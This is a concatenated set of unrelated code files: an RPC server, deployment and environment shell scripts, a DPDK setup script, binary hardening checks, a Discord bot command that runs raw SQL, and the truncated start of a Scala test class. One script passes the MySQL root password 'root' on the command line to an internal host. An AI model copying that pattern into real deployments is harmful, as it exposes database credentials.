class RPCHandler(asyncore.dispatcher_with_send):
    """Per-connection handler decoding length-prefixed protobuf RPC requests."""

    def __init__(self,sock,addr):
        asyncore.dispatcher_with_send.__init__(self,sock=sock)
        self.addr = addr
        # Dispatch table: RPC method name -> bound handler.
        self.handlers = {"ping":self.ping,"pi":self.pi}
        # Read buffer accumulating raw bytes until a full frame is available.
        self.rbuf = StringIO()
        print "RPCHandler __init__"

    def ping(self,params):
        # Echo-style RPC: replies with a pong message and the given params.
        print "服务端 RPCHandler() ping"
        self.send_result("RPCHandler()pong",params)

    def pi(self,n):
        # Approximate pi with n+1 terms of the Leibniz series.
        print "客户端 RPCHandler() pi"
        s = 0.0
        for i in range(int(n)+1):
            s += math.pow(-1,i)/(2*i+1)
        p = 4*s
        self.send_result("pi_server_return:",p)

    def send_result(self,out,result):
        """Serialize (out, result) as a length-prefixed protobuf frame and send."""
        # response = {"out":out,"result":result}
        response = Request_pb2.Request()
        response._in = out
        response.params = str(result)
        # body = json.dumps(response)
        body = response.SerializeToString()
        # 4-byte native-endian unsigned length prefix.
        length_prefix = struct.pack("I",len(body))
        self.send(length_prefix)
        self.send(body)

    def handle_connect(self):
        print self.addr,'handle_connect() client comes...'

    def handle_close(self):
        print self.addr,'handle_close() bye...'

    def handle_read(self):
        # Drain the socket in 1KB chunks into the read buffer, then dispatch.
        while True:
            content = self.recv(1024)
            print "handle_read() content...",content
            if content:
                self.rbuf.write(content)
            if len(content)<1024:
                print "读取完毕"
                break
        self.handle_rpc()

    def handle_rpc(self):
        """Decode and dispatch every complete frame currently in the buffer."""
        while True:
            self.rbuf.seek(0)
            length_prefix = self.rbuf.read(4)
            if len(length_prefix) < 4:
                break # incomplete prefix; wait for more data
            length,=struct.unpack("I",length_prefix)
            body = self.rbuf.read(length)
            if len(body) < length:
                break # incomplete body; wait for more data
            # request = json.loads(body)
            request = Request_pb2.Request()
            request.ParseFromString(body)
            # in_ = request['in']
            # params = request['params']
            in_ = request._in
            params = request.params
            print os.getpid(), in_, params
            handler = self.handlers[in_]
            handler(str(params))
            # Keep any bytes past this frame for the next iteration.
            left = self.rbuf.getvalue()[length + 4:]
            print left
            self.rbuf = StringIO()
            self.rbuf.write(left)
            self.rbuf.seek(0, 2)
if __name__ == "__main__":
    # Usage: server.py <host> <port>
    host = sys.argv[1]
    port = int(sys.argv[2])
    print host,port
    RPCServer(host,port)
    # Enter the asyncore event loop (runs in parent and worker processes).
    asyncore.loop()
|
#!/bin/bash
# Load the Davinci schema into the remote MySQL 'test' database.
# NOTE(review): credentials are hard-coded on the command line (visible in the
# process list) — consider ~/.my.cnf or environment variables instead.
mysql -P 3306 -h 10.143.129.32 -u root -proot test < $DAVINCI_HOME/bin/davinci.sql
|
#!/bin/bash
# Watch TARGET's current year/month folder and move every newly created file
# whose contents contain STRING into the matching folder under DESTINY.
TARGET=~/origem/
DESTINY=~/destino/
STRING="Substring to Search"

inotifywait -m -e create -e moved_to --format "%f" "${TARGET}$(date +%Y/%m/)" \
    | while read -r FILENAME
    do
        # Bug fix: "$STRING" must be quoted — unquoted, the multi-word pattern
        # was split into a grep pattern plus stray file arguments, so the
        # intended substring was never actually searched for.
        # (read -r also prevents backslashes in filenames being mangled.)
        if grep -q "$STRING" "${TARGET}$(date +%Y/%m/)${FILENAME}"; then
            mv "${TARGET}$(date +%Y/%m/)${FILENAME}" "${DESTINY}$(date +%Y/%m/)${FILENAME}"
        fi
    done
|
<gh_stars>10-100
# Packaging metadata for the receipt_budget Django application.
from distutils.core import setup
setup(
    name='receipt_budget',
    version='0.6',
    # NOTE(review): 'receipts.receipts-app' contains a hyphen, which is not a
    # valid Python package identifier — confirm the directory name is intended.
    packages=['receipts.receipts', 'receipts.receipts-app'],
    url='https://github.com/rolisz/receipt_budget',
    license='BSD',
    author='Roland',
    author_email='<EMAIL>',
    description='An application for managing expenses and doing OCR on receipts',
    # Informational dependency list (distutils does not install these).
    requires=[
        'django (>= 1.5)', 'scikitlearn', 'SimpleCV', 'django-tokenapi',
        'django-userena', 'geopy'
    ]
)
|
-- Metadata registry describing each field (column) of application tables.
CREATE TABLE [core].[Fields]
(
    [Id] INT NOT NULL PRIMARY KEY identity(100000,1), -- surrogate key, seeded at 100000
    [TableName] varchar(64) not null,                 -- owning table
    [Name] varchar(64) not null,                      -- physical column name
    [Title] varchar(64) not null,                     -- display title
    [Type] int not null,                              -- logical type code
    [IsHidden] bit not null default(0),
    [IsDeleted] bit not null default(0),              -- soft-delete flag
    [IsSystem] bit not null default(0),
    [IsAutoGenerated] bit not null default(0),
    [ShowInUi] bit not null default(1),
    [UiIndex] int not null default(0),                -- display ordering in the UI
    [SqlDataType] varchar(64) not null,
    --[InternalName] varchar(64) not null,
    -- A field name may appear only once per table.
    CONSTRAINT UniqueTableNameFieldName UNIQUE NONCLUSTERED ([TableName],[Name])
)
|
#!/usr/bin/env bash
#
# Copyright (c) 2010 - 2021, Fraunhofer-Gesellschaft zur Foerderung der angewandten Forschung e.V.
# All rights reserved.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# We kindly request you to use one or more of the following phrases to refer to
# foxBMS in your hardware, software, documentation or advertising materials:
#
# - "This product uses parts of foxBMS®"
# - "This product includes parts of foxBMS®"
# - "This product is derived from foxBMS®"
# Platform dispatcher: extend PATH from a per-OS config file, activate the
# project conda environment, run python with the script's arguments, then
# deactivate. MacOS and Cygwin/32-bit Windows are rejected.
set -e
# MacOS
if [ "$(uname)" == "Darwin" ]; then
    echo "MacOS is currently not supported."
    exit 1
# Linux
elif [ "$(expr substr $(uname -s) 1 5)" == "Linux" ]; then
    SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
    # Accumulate the configured paths, converting stray CR characters.
    while read -r line; do
        PATHS_TO_ADD=`echo "${PATHS_TO_ADD}:$line"| sed --expression='s/^M/:/g'`
    done < ${SCRIPTDIR}/../../../conf/env/paths_linux.txt
    # Translate Windows-style drive prefixes and backslashes.
    PATHS_TO_ADD=`echo $PATHS_TO_ADD | awk '{gsub("C:", "/c", $0); print}'`
    PATHS_TO_ADD=$(echo "${PATHS_TO_ADD#?}" | tr '\\' '/')
    export PATH=$PATHS_TO_ADD:$PATH
    # call find_base_conda and make sure that we do not exit by printing
    # the exit code to CONDA_VARS (otherwise we would exit with set -e, here
    # we will not as echo returns exit code 0)
    CONDA_VARS=$($SCRIPTDIR/../../../tools/utils/bash/find_base_conda.sh || echo $?)
    if [ "${CONDA_VARS: -1}" == "1" ]; then
        # strip the exit code that we have printed to CONDA_VARS and
        # print the rest
        echo "${CONDA_VARS: : -1}"
        exit 1
    fi
    # Whitespace-split output: base env, activate script, dev env name, config file.
    CONDA_VARS_ARRAY=($CONDA_VARS)
    CONDA_BASE_ENVIRONMENT_INCLUDING_DEVELOPMENT_ENVIRONMENT=${CONDA_VARS_ARRAY[0]}
    CONDA_BASE_ENVIRONMENT_ACTIVATE_SCRIPT=${CONDA_VARS_ARRAY[1]}
    CONDA_DEVELOPMENT_ENVIRONMENT_NAME=${CONDA_VARS_ARRAY[2]}
    CONDA_DEVELOPMENT_ENVIRONMENT_CONFIGURATION_FILE=${CONDA_VARS_ARRAY[3]}
    source $CONDA_BASE_ENVIRONMENT_ACTIVATE_SCRIPT base
    conda activate ${CONDA_DEVELOPMENT_ENVIRONMENT_NAME}
    # NOTE(review): 'set +' / 'set -' below look like they were meant to be
    # 'set +e' / 'set -e' (tolerate python failing so the env is always
    # deactivated) — confirm; as written they do not toggle errexit.
    set + # deactivate in any case the environment, therefore ignore errors
    python "$@"
    set -
    conda deactivate
# Windows
elif [ "$(expr substr $(uname -s) 1 9)" == "CYGWIN_NT" ]; then
    echo "Cygwin is not supported."
    exit 1
elif [ "$(expr substr $(uname -s) 1 10)" == "MINGW32_NT" ]; then
    echo "32bit Windows is not supported."
    exit 1
elif [ "$(expr substr $(uname -s) 1 10)" == "MINGW64_NT" ] || [ "$(expr substr $(uname -s) 1 7)" == "MSYS_NT" ] ; then
    # Force codepage 850 for the duration of the run, restoring it afterwards.
    CODEPAGE=`chcp.com | sed 's/[^0-9]*//g'`
    if [ "$CODEPAGE" != "850" ]; then
        chcp.com 850 >/dev/null 2>&1
    fi
    SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
    while read -r line; do
        PATHS_TO_ADD=`echo "${PATHS_TO_ADD}:$line"| sed --expression='s/^M/:/g'`
    done < ${SCRIPTDIR}/../../../conf/env/paths_win32.txt
    PATHS_TO_ADD=`echo $PATHS_TO_ADD | awk '{gsub("C:", "/c", $0); print}'`
    PATHS_TO_ADD=$(echo "${PATHS_TO_ADD#?}" | tr '\\' '/')
    export PATH=$PATHS_TO_ADD:$PATH
    CONDA_VARS=$($SCRIPTDIR/find_base_conda.sh)
    CONDA_VARS_ARRAY=($CONDA_VARS)
    CONDA_BASE_ENVIRONMENT_INCLUDING_DEVELOPMENT_ENVIRONMENT=${CONDA_VARS_ARRAY[0]}
    CONDA_BASE_ENVIRONMENT_ACTIVATE_SCRIPT=${CONDA_VARS_ARRAY[1]}
    CONDA_DEVELOPMENT_ENVIRONMENT_NAME=${CONDA_VARS_ARRAY[2]}
    CONDA_DEVELOPMENT_ENVIRONMENT_CONFIGURATION_FILE=${CONDA_VARS_ARRAY[3]}
    source $CONDA_BASE_ENVIRONMENT_ACTIVATE_SCRIPT base
    conda activate ${CONDA_DEVELOPMENT_ENVIRONMENT_NAME}
    python.exe "$@"
    conda deactivate
    chcp.com $CODEPAGE >/dev/null 2>&1
fi
|
class ServerCreation:
    """Result of a server-creation API call: the server, the creation action,
    any follow-up actions, and (optionally) the generated root password."""

    # Fixed attribute set; instances carry no __dict__.
    __slots__ = (
        "server",
        "action",
        "next_actions",
        "root_password"
    )

    def __init__(self, server, action, next_actions, root_password=None):
        # root_password is None when the server was created with an SSH key.
        self.server = server
        self.action = action
        self.next_actions = next_actions
        self.root_password = root_password

    def get_server(self):
        """Return the created server object."""
        return self.server

    def get_action(self):
        """Return the action that tracks the creation progress."""
        return self.action

    def get_next_actions(self):
        """Return the follow-up actions scheduled after creation."""
        return self.next_actions

    def get_root_password(self):
        """Return the generated root password, or None if not applicable."""
        return self.root_password
#*******************************************************************************
# Copyright 2014-2020 Intel Corporation
# All Rights Reserved.
#
# This software is licensed under the Apache License, Version 2.0 (the
# "License"), the following terms apply:
#
# You may not use this file except in compliance with the License. You may
# obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#*******************************************************************************
# NOTE(review): the shebang below is not on the first line of the file, so it
# has no effect when the script is executed directly — confirm it is intended
# only as documentation / for sourcing.
#!/bin/bash
# Source the DPC++ compiler environment when its vars script is configured.
# if dpc++ vars path is specified
if [ ! -z "${DPCPP_VAR}" ]; then
    source ${DPCPP_VAR}
fi
# Prefer a locally built oneDAL over the conda 'daal' package when DAALROOT
# is set: remove the conda package and source the local environment instead.
# if DAALROOT is specified
if [ ! -z "${DAALROOT}" ]; then
    conda remove daal --force -y
    source ${DAALROOT}/env/vars.sh
fi
|
#!/usr/bin/env bash
# shellcheck disable=SC2154
# these top lines are moved during build
# Validate CHK_FORTIFY_FILE (expanding '~', checking existence/readability and
# that it is an ELF binary), locate libc, collect the _FORTIFY_SOURCE-checked
# function lists from libc and the binary, and emit the fortify report.
# Relies on helpers defined elsewhere: echo_message, FS_libc_check,
# FS_binary_check, FS_comparison, FS_summary, and the ${readelf} variable.
chk_fortify_file() {
    # if first char of pathname is '~' replace it with '${HOME}'
    if [[ "${CHK_FORTIFY_FILE:0:1}" = '~' ]]; then
        CHK_FORTIFY_FILE=${HOME}/${CHK_FORTIFY_FILE:1}
    fi
    if [[ -z "${CHK_FORTIFY_FILE}" ]]; then
        printf "\033[31mError: Please provide a valid file.\033[m\n\n"
        exit 1
    fi
    # does the file exist?
    if [[ ! -f "${CHK_FORTIFY_FILE}" ]]; then
        printf "\033[31mError: The file '%s' does not exist.\033[m\n\n" "${CHK_FORTIFY_FILE}"
        exit 1
    fi
    # read permissions?
    if [[ ! -r "${CHK_FORTIFY_FILE}" ]]; then
        printf "\033[31mError: No read permissions for '%s' (run as root).\033[m\n\n" "${CHK_FORTIFY_FILE}"
        exit 1
    fi
    # ELF executable? (resolve symlinks before probing with file(1))
    out=$(file "$(readlink -f "${CHK_FORTIFY_FILE}")")
    if [[ ! ${out} =~ ELF ]]; then
        printf "\033[31mError: Not an ELF file: "
        file "${CHK_FORTIFY_FILE}"
        printf "\033[m\n"
        exit 1
    fi
    # Probe the well-known multiarch locations for libc.
    if [[ -e /lib/libc.so.6 ]]; then
        FS_libc=/lib/libc.so.6
    elif [[ -e /lib64/libc.so.6 ]]; then
        FS_libc=/lib64/libc.so.6
    elif [[ -e /lib/i386-linux-gnu/libc.so.6 ]]; then
        FS_libc=/lib/i386-linux-gnu/libc.so.6
    elif [[ -e /lib/x86_64-linux-gnu/libc.so.6 ]]; then
        FS_libc=/lib/x86_64-linux-gnu/libc.so.6
    elif [[ -e /lib/arm-linux-gnueabihf/libc.so.6 ]]; then
        FS_libc=/lib/arm-linux-gnueabihf/libc.so.6
    elif [[ -e /lib/aarch64-linux-gnu/libc.so.6 ]]; then
        FS_libc=/lib/aarch64-linux-gnu/libc.so.6
    else
        printf "\033[31mError: libc not found.\033[m\n\n"
        exit 1
    fi
    # _chk-suffixed symbols exported by libc, and all symbols in the target.
    FS_chk_func_libc=()
    FS_functions=()
    while IFS='' read -r line; do FS_chk_func_libc+=("$line"); done < <(${readelf} -s ${FS_libc} 2> /dev/null | grep _chk@@ | awk '{ print $8 }' | cut -c 3- | sed -e 's/_chk@.*//')
    while IFS='' read -r line; do FS_functions+=("$line"); done < <(${readelf} -s "${CHK_FORTIFY_FILE}" 2> /dev/null | awk '{ print $8 }' | sed 's/_*//' | sed -e 's/@.*//')
    echo_message "" "" "<fortify-test name='${CHK_FORTIFY_FILE}' " "{ \"fortify-test\": { \"name\":\"${CHK_FORTIFY_FILE}\" "
    FS_libc_check
    FS_binary_check
    FS_comparison
    FS_summary
    echo_message "" "" "</fortify-test>\n" "} }"
}
# Same fortify analysis as chk_fortify_file, but for a running process:
# validates the PID, checks read access to /proc/<pid>/exe, then analyses
# that executable. Relies on external helpers: isNumeric, root_privs,
# echo_message, FS_libc_check, FS_binary_check, FS_comparison, FS_summary.
chk_fortify_proc() {
    if [[ -z "${CHK_FORTIFY_PROC}" ]]; then
        printf "\033[31mError: Please provide a valid process ID.\033[m\n\n"
        exit 1
    fi
    if ! (isNumeric "${CHK_FORTIFY_PROC}"); then
        printf "\033[31mError: Please provide a valid process ID.\033[m\n\n"
        exit 1
    fi
    cd /proc || exit
    N=${CHK_FORTIFY_PROC}
    if [[ -d "${N}" ]]; then
        # read permissions?
        if [[ ! -r "${N}/exe" ]]; then
            if ! (root_privs); then
                printf "\033[31mNo read permissions for '/proc/%s/exe' (run as root).\033[m\n\n" "${N}"
                exit 1
            fi
            # An unreadable exe link with root privileges indicates a kernel thread.
            if [[ ! "$(readlink "${N}/exe")" ]]; then
                printf "\033[31mPermission denied. Requested process ID belongs to a kernel thread.\033[m\n\n"
                exit 1
            fi
            exit 1
        fi
        # Probe the well-known locations for libc.
        # NOTE(review): this list omits the ARM multiarch paths that
        # chk_fortify_file checks — confirm whether that asymmetry is intended.
        if [[ -e /lib/libc.so.6 ]]; then
            FS_libc=/lib/libc.so.6
        elif [[ -e /lib64/libc.so.6 ]]; then
            FS_libc=/lib64/libc.so.6
        elif [[ -e /lib/i386-linux-gnu/libc.so.6 ]]; then
            FS_libc=/lib/i386-linux-gnu/libc.so.6
        elif [[ -e /lib/x86_64-linux-gnu/libc.so.6 ]]; then
            FS_libc=/lib/x86_64-linux-gnu/libc.so.6
        else
            printf "\033[31mError: libc not found.\033[m\n\n"
            exit 1
        fi
        # Process name from the first line of /proc/<pid>/status.
        name=$(head -1 "${N}/status" | cut -b 7-)
        echo_message "* Process name (PID) : ${name} (${N})\n" "" "" ""
        FS_chk_func_libc=()
        FS_functions=()
        while IFS='' read -r line; do FS_chk_func_libc+=("$line"); done < <(${readelf} -s $FS_libc 2> /dev/null | grep _chk@@ | awk '{ print $8 }' | cut -c 3- | sed -e 's/_chk@.*//')
        while IFS='' read -r line; do FS_functions+=("$line"); done < <(${readelf} -s "${CHK_FORTIFY_PROC}/exe" 2> /dev/null | awk '{ print $8 }' | sed 's/_*//' | sed -e 's/@.*//')
        echo_message "" "" "<fortify-test name='${name}' pid='${N}' " "{ \"fortify-test\": { \"name\":\"${name}\", \"pid\":\"${N}\" "
        FS_libc_check
        FS_binary_check
        FS_comparison
        FS_summary
        echo_message "" "" "</fortify-test>\n" "} }"
    fi
}
|
module.exports = {
port: process.env.PORT,
files: ["./**/*.{html, htm, css, js}"],
server: {
baseDir: ["./src", "./build/contracts"]
}
};
|
#!/bin/sh
# Build the git-crypt-team RPM with fpm, using VERSION and README.md from the
# script's own directory for the package version and description.
SCRIPT=$(readlink -f "$0")
DIR=$(dirname "$SCRIPT")
PKG_NAME='git-crypt-team'
SUMMARY="Centralized key management and rekeying for teams using git-crypt."
URL="https://github.com/inhumantsar/bash-git-crypt-team"
MAINTAINER="Shaun Martin <shaun@samsite.ca>"
# -s dir: package a directory tree; -t rpm: emit an RPM; -f: overwrite output.
fpm -s dir -t rpm -f -C $DIR \
  -n $PKG_NAME --prefix /usr/bin \
  -v "$(cat ${DIR}/VERSION)" -a noarch \
  -m "${MAINTAINER}" --vendor "${MAINTAINER}" -d git -d gpg -d jq \
  --description "$(cat ${DIR}/README.md)" \
  --rpm-summary "${SUMMARY}" \
  --url "$URL" --license BSD git-crypt-team
|
echo ""
echo "*******************************"
echo "PcapPlusPlus setup DPDK script "
echo "*******************************"
echo ""

# Print usage information for this script.
# Bug fix: the usage line previously advertised '-g' for the huge-page amount,
# but the option actually parsed by getopts (and described in the list below)
# is '-p'.
show_help() {
    echo "usage: setup-dpdk.sh -p AMOUNT_OF_HUGE_PAGES_TO_ALLOCATE -n NICS_TO_BIND_IN_COMMA_SEPARATED_LIST [-s] [-h]"
    echo "options:"
    echo " -p : amount of huge pages to allocate (huge pages are needed for DPDK's memory allocations)"
    echo " -n : a comma-separated list of all NICs that will be unbinded from Linux and move to DPDK control"
    echo "      only these NICs will be used by DPDK. Example: eth0,eth1"
    echo " -s : display current Ethernet device settings (which are binded to Linux and which to DPDK)"
    echo " -h : show this help screen"
}
# setup DPDK variables
export RTE_SDK=/home/pravein/pcapplusplus/dpdk-stable-17.11.1/
# in DPDK 16.11 help scripts are still in 'tools' dir but in 17.02 dir was renamed to 'usertools'
TOOLS_DIR=""
if [ -d $RTE_SDK/tools ]; then TOOLS_DIR=tools; else TOOLS_DIR=usertools; fi
# read and parse arguments
OPTIND=1         # Reset in case getopts has been used previously in the shell.
HUGE_PAGE_TO_ALLOCATE=0
NICS_TO_BIND=""
while getopts "h?sp:n:" opt; do
    case "$opt" in
    h|\?)
        show_help
        exit 0
        ;;
    p)  HUGE_PAGE_TO_ALLOCATE=$OPTARG
        ;;
    n)  NICS_TO_BIND=$OPTARG
        ;;
    s)  ${RTE_SDK}/${TOOLS_DIR}/dpdk-devbind.py --status
        exit 0
        ;;
    esac
done
shift $((OPTIND-1))
[ "$1" = "--" ] && shift
# verify huge page amount is indeed a number
re='^[0-9]+$'
if ! [[ $HUGE_PAGE_TO_ALLOCATE =~ $re ]] ; then
   echo "Error: Huge-page amount is not a number"
   echo
   show_help
   exit 1
fi
# verify nic list was given
if [[ $NICS_TO_BIND == "" ]] ; then
   echo "Error: List of NICs to bind was not given"
   echo
   show_help
   exit 1
fi
# setup huge-pages: reserve the requested amount (2MB pages) and mount
# hugetlbfs, unless the kernel already has that amount reserved.
CUR_HUGE=$(cat /proc/meminfo | grep -s HugePages_Total | awk '{print $2}')
if [ $CUR_HUGE != $HUGE_PAGE_TO_ALLOCATE ] ; then
   HUGEPAGE_MOUNT=/mnt/huge
   # Written via a temp script run under sudo because the redirection itself
   # needs root privileges.
   echo "echo $HUGE_PAGE_TO_ALLOCATE > /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages" > .echo_tmp
   sudo sh .echo_tmp
   rm -f .echo_tmp
   sudo mkdir -p ${HUGEPAGE_MOUNT}
   sudo mount -t hugetlbfs nodev ${HUGEPAGE_MOUNT}
   echo "1. Reserve huge-pages - DONE!"
else
   echo "1. Huge-pages already allocated"
fi
# install kernel modules; first make sure every requested NIC is still bound
# to Linux (visible in ifconfig) before touching anything.
IFS=","
for NIC_TO_BIND in $NICS_TO_BIND ; do
   ifconfig | grep -s "^$NIC_TO_BIND" > /dev/null
   if [ $? -eq 1 ] ; then
      echo "2. $NIC_TO_BIND is already binded to DPDK or doesn't exist. Exiting"
      echo
      ${RTE_SDK}/${TOOLS_DIR}/dpdk-devbind.py --status
      exit 1
   fi
done
# Reload igb_uio freshly (depends on the generic uio module).
lsmod | grep -s igb_uio > /dev/null
if [ $? -eq 0 ] ; then
   sudo rmmod igb_uio
fi
sudo modprobe uio
sudo insmod ${RTE_SDK}/build/kmod/igb_uio.ko
echo "2. Install kernel module - DONE!"
# bind network adapters: take each NIC down and hand it to igb_uio/DPDK.
IFS=","
for NIC_TO_BIND in $NICS_TO_BIND ; do
   sudo ifconfig ${NIC_TO_BIND} down
   sudo ${RTE_SDK}/${TOOLS_DIR}/dpdk-devbind.py --bind=igb_uio ${NIC_TO_BIND}
done
echo "3. Bind network adapters - DONE!"
${RTE_SDK}/${TOOLS_DIR}/dpdk-devbind.py --status
echo "Setup DPDK completed"
|
const { MessageEmbed, MessageActionRow, MessageButton } = require('discord.js');
const { SlashCommandBuilder, codeBlock } = require('@discordjs/builders');
const { errorlog, commanderror_message } = require('../../functions/error');
const { inspect } = require('better-sqlite3/lib/util');
module.exports = {
info: {
name: 'db',
description: 'データベースに直接接続',
usage: '[実行するクエリ文]',
aliases: [],
category: 'owner',
},
data: new SlashCommandBuilder()
.setName('db')
.setDescription('データベースに直接接続')
.addStringOption(option => {
option.setName('query');
option.setDescription('クエリ文');
option.setRequired(true);
return option;
}),
/**
* @param {import('../../utils/Bot')} client
* @param {import('discord.js').CommandInteraction} interaction
*/
run: async function (client, interaction) {
try {
const query = interaction.options.getString('query', true).split(/\s+/)[0].toLowerCase();
if (query === 'select') {
try {
await interaction.followUp(
{
embeds: [
new MessageEmbed()
.setTitle('実行結果')
.setDescription(codeBlock(inspect(client.db.prepare(interaction.options.getString('query', true)).get())))
.setColor('RANDOM')
.setTimestamp(),
],
},
);
}
catch (error) {
await interaction.followUp(
{
embeds: [
new MessageEmbed()
.setTitle('実行結果')
.setDescription(codeBlock(error.stack))
.setColor('RANDOM')
.setTimestamp(),
],
},
);
}
}
else if (['insert', 'update', 'delete'].includes(query)) {
const buttons = new MessageActionRow()
.addComponents(
new MessageButton()
.setCustomId('ok')
.setEmoji('810436146718441483')
.setStyle('PRIMARY'),
new MessageButton()
.setCustomId('no')
.setEmoji('810436146978619392')
.setStyle('PRIMARY'),
);
const msg = await interaction.followUp(
{
content: 'この変更でいい場合はokを、取り消す場合はnoを送信してください',
embeds: [
new MessageEmbed()
.setDescription(codeBlock('sql', interaction.options.getString('query', true)))
.setColor('RANDOM')
.setTimestamp(),
],
components: [
buttons,
],
},
);
const filter = (i) => (i.customId === 'ok' || i.customId === 'no') && i.user.id === interaction.user.id;
const response2 = await msg.awaitMessageComponent({ filter, componentType: 'BUTTON', max: 1, time: 60000 });
if (!response2) { return await interaction.deleteReply(); }
else if (response2.customId === 'no') {
await interaction.deleteReply();
}
else if (response2.customId === 'ok') {
try {
await interaction.editReply(
{
embeds: [
new MessageEmbed()
.setTitle('実行結果')
.setDescription(codeBlock(inspect(client.db.prepare(interaction.options.getString('query', true)).run())))
.setColor('RANDOM')
.setTimestamp(),
],
components: [],
},
);
}
catch (error) {
await interaction.editReply(
{
embeds: [
new MessageEmbed()
.setTitle('実行結果')
.setDescription(codeBlock(error.stack))
.setColor('RANDOM')
.setTimestamp(),
],
components: [],
},
);
}
}
}
else {
await interaction.followUp('その基本命令文は対応していません。\n`SELECT・INSERT・UPDATE・DELETE・CLOSE` のみ対応しています');
}
}
catch (error) {
errorlog(client, interaction, error);
}
},
/**
*
* @param {import('../../utils/Bot')} client
* @param {import('discord.js').Message} message
* @param {Array<string>} args
*/
run_message: async function (client, message, args) {
try {
if (!args[0]) return await message.reply('引数にクエリ文を入れてください');
const query = args[0].split(/\s+/)[0].toLowerCase();
if (query === 'select') {
try {
await message.reply(
{
embeds: [
new MessageEmbed()
.setTitle('実行結果')
.setDescription(codeBlock(inspect(client.db.prepare(args.join(' ')).get())))
.setColor('RANDOM')
.setTimestamp(),
],
},
);
}
catch (error) {
await message.reply(
{
embeds: [
new MessageEmbed()
.setTitle('実行結果')
.setDescription(codeBlock(error.stack))
.setColor('RANDOM')
.setTimestamp(),
],
},
);
}
}
else if (['insert', 'update', 'delete'].includes(query)) {
const buttons = new MessageActionRow()
.addComponents(
new MessageButton()
.setCustomId('ok')
.setEmoji('810436146718441483')
.setStyle('PRIMARY'),
new MessageButton()
.setCustomId('no')
.setEmoji('810436146978619392')
.setStyle('PRIMARY'),
);
const msg = await message.reply(
{
content: 'この変更でいい場合はokを、取り消す場合はnoを送信してください',
embeds: [
new MessageEmbed()
.setDescription(codeBlock('sql', args.join(' ')))
.setColor('RANDOM')
.setTimestamp(),
],
components: [
buttons,
],
},
);
const filter = (i) => (i.customId === 'ok' || i.customId === 'no') && i.user.id === message.user.id;
const response2 = await msg.awaitMessageComponent({ filter, componentType: 'BUTTON', max: 1, time: 60000 });
if (!response2) {
return await msg.delete();
}
else if (response2.customId === 'no') {
await msg.delete();
}
else if (response2.customId === 'ok') {
try {
await msg.edit(
{
embeds: [
new MessageEmbed()
.setTitle('実行結果')
.setDescription(codeBlock(inspect(client.db.prepare(args.join(' ')).run())))
.setColor('RANDOM')
.setTimestamp(),
],
components: [],
},
);
}
catch (error) {
await msg.edit(
{
embeds: [
new MessageEmbed()
.setTitle('実行結果')
.setDescription(codeBlock(error.stack))
.setColor('RANDOM')
.setTimestamp(),
],
components: [],
},
);
}
}
}
else {
await message.reply('その基本命令文は対応していません。\n`SELECT・INSERT・UPDATE・DELETE` のみ対応しています');
}
}
catch (error) {
commanderror_message(client, message, error);
}
},
}; |
#!/bin/bash
# Runs the Dart tool that strips boilerplate files from the Flutter
# template project in this repository.
flutter pub run tool/dart_tool/strip_boilerplate_project.dart
/*
* Copyright 2016 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.midonet.cluster.storage
import java.util.UUID
import com.codahale.metrics.MetricRegistry
import com.typesafe.config.Config
import org.apache.curator.framework.CuratorFramework
import org.apache.curator.framework.state.ConnectionState
import org.mockito.Mockito._
import rx.subjects.BehaviorSubject
import org.midonet.cluster.data.storage.model.{ArpEntry, Fip64Entry}
import org.midonet.cluster.data.storage.{InMemoryStorage, StateStorage, StateTableStorage, Storage}
import org.midonet.cluster.models.Neutron.NeutronNetwork
import org.midonet.cluster.models.Topology
import org.midonet.cluster.models.Topology.Router
import org.midonet.cluster.services.MidonetBackend
import org.midonet.cluster.services.discovery.{FakeDiscovery, MidonetDiscovery}
import org.midonet.cluster.services.state.client.StateTableClient
import org.midonet.conf.MidoTestConfigurator
import org.midonet.packets.{IPv4Addr, MAC}
import org.midonet.util.eventloop.Reactor
/** In-memory MidonetBackend for unit tests: every storage interface is served
  * by one shared InMemoryStorage, and curator handles default to Mockito mocks. */
class MidonetTestBackend (curatorParam: CuratorFramework) extends MidonetBackend {

